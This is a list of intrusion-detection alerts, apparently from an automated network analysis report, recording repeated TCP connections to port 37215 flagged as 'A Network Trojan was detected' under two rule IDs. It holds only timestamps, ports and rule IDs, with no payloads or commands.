                  Timestamp:07/10/24-08:27:10.699578
                  SID:2829579
                  Source Port:36078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:56612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2835222
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.848557
                  SID:2835222
                  Source Port:46348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.529956
                  SID:2835222
                  Source Port:50632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.730689
                  SID:2829579
                  Source Port:36120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.524750
                  SID:2835222
                  Source Port:36606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.604858
                  SID:2829579
                  Source Port:59308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652788
                  SID:2835222
                  Source Port:46364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486596
                  SID:2835222
                  Source Port:45226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376641
                  SID:2835222
                  Source Port:51320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.740635
                  SID:2829579
                  Source Port:55184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.932047
                  SID:2829579
                  Source Port:51194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626049
                  SID:2829579
                  Source Port:37548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879278
                  SID:2829579
                  Source Port:33632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.975587
                  SID:2829579
                  Source Port:48142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624667
                  SID:2835222
                  Source Port:36962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.981367
                  SID:2829579
                  Source Port:52180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.051203
                  SID:2835222
                  Source Port:46836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.228026
                  SID:2835222
                  Source Port:54606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666714
                  SID:2829579
                  Source Port:37054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851714
                  SID:2829579
                  Source Port:55112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.120047
                  SID:2835222
                  Source Port:55746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.336820
                  SID:2835222
                  Source Port:37538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.132992
                  SID:2829579
                  Source Port:55856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201699
                  SID:2835222
                  Source Port:50836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988172
                  SID:2829579
                  Source Port:38252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2835222
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813781
                  SID:2835222
                  Source Port:54794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.880092
                  SID:2835222
                  Source Port:36644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.606817
                  SID:2829579
                  Source Port:60510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.502919
                  SID:2829579
                  Source Port:59724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.861604
                  SID:2835222
                  Source Port:41644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190185
                  SID:2829579
                  Source Port:52774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981782
                  SID:2835222
                  Source Port:33598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651021
                  SID:2835222
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565091
                  SID:2835222
                  Source Port:43658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.783932
                  SID:2835222
                  Source Port:54884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883376
                  SID:2835222
                  Source Port:59236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865668
                  SID:2829579
                  Source Port:47590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750932
                  SID:2829579
                  Source Port:48824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.657807
                  SID:2829579
                  Source Port:45234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.153609
                  SID:2835222
                  Source Port:54422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596367
                  SID:2835222
                  Source Port:37806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.332211
                  SID:2835222
                  Source Port:58104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.852897
                  SID:2829579
                  Source Port:53996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564607
                  SID:2835222
                  Source Port:34792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.613334
                  SID:2829579
                  Source Port:33154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467613
                  SID:2835222
                  Source Port:49936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885160
                  SID:2829579
                  Source Port:43798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2829579
                  Source Port:51428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.642327
                  SID:2829579
                  Source Port:49410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.826024
                  SID:2835222
                  Source Port:57040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.691273
                  SID:2835222
                  Source Port:43580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2835222
                  Source Port:39276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2829579
                  Source Port:49326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003215
                  SID:2835222
                  Source Port:39580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.610236
                  SID:2829579
                  Source Port:40510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.942131
                  SID:2829579
                  Source Port:43472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.521887
                  SID:2835222
                  Source Port:44538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.607972
                  SID:2835222
                  Source Port:56606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2829579
                  Source Port:38204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064051
                  SID:2835222
                  Source Port:56956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.249453
                  SID:2835222
                  Source Port:49286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2835222
                  Source Port:40702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.067694
                  SID:2829579
                  Source Port:51834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.435676
                  SID:2835222
                  Source Port:53776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623766
                  SID:2835222
                  Source Port:47946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343143
                  SID:2829579
                  Source Port:38534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294907
                  SID:2829579
                  Source Port:51062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.064753
                  SID:2829579
                  Source Port:35134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.221493
                  SID:2829579
                  Source Port:47658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2835222
                  Source Port:41108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.580617
                  SID:2829579
                  Source Port:38448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139469
                  SID:2835222
                  Source Port:50986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.662602
                  SID:2829579
                  Source Port:48078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.558297
                  SID:2829579
                  Source Port:47110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.844972
                  SID:2835222
                  Source Port:57676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157355
                  SID:2829579
                  Source Port:36626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2835222
                  Source Port:40300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777046
                  SID:2835222
                  Source Port:57564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027319
                  SID:2829579
                  Source Port:44378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.822867
                  SID:2835222
                  Source Port:59804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.570242
                  SID:2835222
                  Source Port:40326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448470
                  SID:2835222
                  Source Port:40872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.799492
                  SID:2835222
                  Source Port:41400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121354
                  SID:2835222
                  Source Port:40652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.923272
                  SID:2835222
                  Source Port:36566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202638
                  SID:2829579
                  Source Port:37102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823884
                  SID:2829579
                  Source Port:45862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.861784
                  SID:2829579
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.375858
                  SID:2835222
                  Source Port:59136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.868751
                  SID:2835222
                  Source Port:48034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793732
                  SID:2835222
                  Source Port:46824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084345
                  SID:2829579
                  Source Port:55964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2835222
                  Source Port:32870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.550512
                  SID:2829579
                  Source Port:40106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.765142
                  SID:2829579
                  Source Port:48108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.047442
                  SID:2829579
                  Source Port:37690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584123
                  SID:2835222
                  Source Port:45088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177763
                  SID:2835222
                  Source Port:45656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.702243
                  SID:2829579
                  Source Port:50902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.503122
                  SID:2829579
                  Source Port:51794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.312291
                  SID:2829579
                  Source Port:59154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.615423
                  SID:2829579
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.881583
                  SID:2835222
                  Source Port:49290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262601
                  SID:2829579
                  Source Port:48834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.359500
                  SID:2829579
                  Source Port:43106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.672388
                  SID:2829579
                  Source Port:47358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.168197
                  SID:2835222
                  Source Port:60580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.234449
                  SID:2829579
                  Source Port:47910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.027011
                  SID:2829579
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763475
                  SID:2835222
                  Source Port:51406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.616728
                  SID:2829579
                  Source Port:54118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.339417
                  SID:2829579
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.436856
                  SID:2835222
                  Source Port:56038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526577
                  SID:2835222
                  Source Port:58792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2835222
                  Source Port:45468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549884
                  SID:2829579
                  Source Port:37296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.901338
                  SID:2835222
                  Source Port:45550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.567410
                  SID:2829579
                  Source Port:38606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.594845
                  SID:2829579
                  Source Port:47040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.040763
                  SID:2835222
                  Source Port:49460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003273
                  SID:2829579
                  Source Port:53626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.980540
                  SID:2829579
                  Source Port:45454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873682
                  SID:2835222
                  Source Port:57214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.994829
                  SID:2829579
                  Source Port:35326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.979728
                  SID:2835222
                  Source Port:54430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295095
                  SID:2829579
                  Source Port:41044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.046169
                  SID:2835222
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939160
                  SID:2835222
                  Source Port:54988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.076918
                  SID:2835222
                  Source Port:35126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997172
                  SID:2835222
                  Source Port:59770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.455887
                  SID:2829579
                  Source Port:59400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.753614
                  SID:2829579
                  Source Port:43000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.516345
                  SID:2829579
                  Source Port:47886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.058542
                  SID:2835222
                  Source Port:48346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397388
                  SID:2829579
                  Source Port:50392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099427
                  SID:2829579
                  Source Port:35736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2835222
                  Source Port:38314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.176669
                  SID:2835222
                  Source Port:38966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980422
                  SID:2829579
                  Source Port:59388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.438219
                  SID:2829579
                  Source Port:49190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.530292
                  SID:2829579
                  Source Port:39264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.494437
                  SID:2835222
                  Source Port:32930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.989466
                  SID:2835222
                  Source Port:44494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.313127
                  SID:2829579
                  Source Port:45204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298148
                  SID:2835222
                  Source Port:57264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.538381
                  SID:2835222
                  Source Port:59760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083830
                  SID:2829579
                  Source Port:42338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.707207
                  SID:2835222
                  Source Port:52414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.132992
                  SID:2835222
                  Source Port:41200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076000
                  SID:2829579
                  Source Port:51710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.743404
                  SID:2829579
                  Source Port:46266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.369458
                  SID:2829579
                  Source Port:49008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.380145
                  SID:2835222
                  Source Port:57956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.607136
                  SID:2835222
                  Source Port:40520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234468
                  SID:2829579
                  Source Port:54928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.837323
                  SID:2835222
                  Source Port:33968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.587363
                  SID:2835222
                  Source Port:48382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.923220
                  SID:2835222
                  Source Port:39012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870524
                  SID:2835222
                  Source Port:47782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.146425
                  SID:2835222
                  Source Port:53798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.217078
                  SID:2835222
                  Source Port:60214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.622039
                  SID:2829579
                  Source Port:55144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.869473
                  SID:2835222
                  Source Port:58280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.213910
                  SID:2835222
                  Source Port:56458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.341806
                  SID:2835222
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.340650
                  SID:2835222
                  Source Port:42684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.434935
                  SID:2835222
                  Source Port:55912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161951
                  SID:2835222
                  Source Port:38202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.592657
                  SID:2829579
                  Source Port:34166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979400
                  SID:2829579
                  Source Port:45772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061341
                  SID:2835222
                  Source Port:35356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.260119
                  SID:2835222
                  Source Port:49376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.638597
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.407706
                  SID:2829579
                  Source Port:52630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2835222
                  Source Port:59842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.642982
                  SID:2835222
                  Source Port:47948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163791
                  SID:2835222
                  Source Port:41472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.998271
                  SID:2835222
                  Source Port:43576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814153
                  SID:2835222
                  Source Port:56282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.617070
                  SID:2835222
                  Source Port:40214
                  Destination Port:37215
                  Protocol:TCP
